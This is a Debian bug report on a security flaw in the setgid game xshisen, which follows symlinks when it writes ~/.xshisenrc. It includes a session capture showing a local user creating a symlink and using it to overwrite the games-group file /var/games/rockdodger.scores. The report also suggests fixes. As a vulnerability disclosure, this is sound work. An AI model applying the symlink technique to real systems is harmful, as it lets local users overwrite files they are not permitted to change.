Bug#291613: ~/.xshisenrc owned by group games, follows symlinks

Fri, 21 Jan 2005 12:38:48 -0800 

Subject: ~/.xshisenrc owned by group games, follows symlinks
Package: xshisen
Version: 1.51-1-1.1
Severity: important
Tags: security

Hello,

xshisen writes a ~/.xshisenrc file with configuration information. The program
is setgid games, so the .xshisenrc file ends up being owned by group games, and
the program follows symlinks when writing it. This adds up to a local user
being able to overwrite files owned by group games and create new files where
the games group is allowed to do so.

To test this, you simply create a symlink, start xshisen, change some
configuration settings, start playing and then exit the program. An example
can be found in this session capture:


[EMAIL PROTECTED]:~$ cat /var/games/rockdodger.scores
109782 Ulf
29846 Ulf
13000 Pad
12500 Pad
6500 Pad
5000 Pad
3000 Pad
2500 Pad
[EMAIL PROTECTED]:~$ ln -s /var/games/rockdodger.scores .xshisenrc
[EMAIL PROTECTED]:~$ ls -al .xshisenrc
lrwxrwxrwx  1 metaur metaur 28 2005-01-21 20:36 .xshisenrc ->
/var/games/rockdodger.scores
[EMAIL PROTECTED]:~$ xshisen
[EMAIL PROTECTED]:~$ cat /var/games/rockdodger.scores
XShisen*gameSize: 0
XShisen*trialMode: false
XShisen*gravityMode: true
XShisen*imageSet: 2
[EMAIL PROTECTED]:~$


I suggest fixing this by either dropping privileges when writing .xshisenrc or
making sure that .xshisenrc isn't a symlink.

// Ulf Harnhammar

-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.8-1-686
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)

Versions of packages xshisen depends on:
ii  libc6                    2.3.2.ds1-20    GNU C Library: Shared libraries an
ii  libgcc1                  1:3.4.3-6       GCC support library
ii  libice6                  4.3.0.dfsg.1-10 Inter-Client Exchange library
ii  libsm6                   4.3.0.dfsg.1-10 X Window System Session Management
ii  libstdc++5               1:3.3.5-5       The GNU Standard C++ Library v3
ii  libx11-6                 4.3.0.dfsg.1-10 X Window System protocol client li
ii  libxaw7                  4.3.0.dfsg.1-10 X Athena widget set library
ii  libxmu6                  4.3.0.dfsg.1-10 X Window System miscellaneous util
ii  libxpm4                  4.3.0.dfsg.1-10 X pixmap library
ii  libxt6                   4.3.0.dfsg.1-10 X Toolkit Intrinsics
ii  xlibs                    4.3.0.dfsg.1-10 X Keyboard Extension (XKB) configu

-- no debconf information

Reply via email to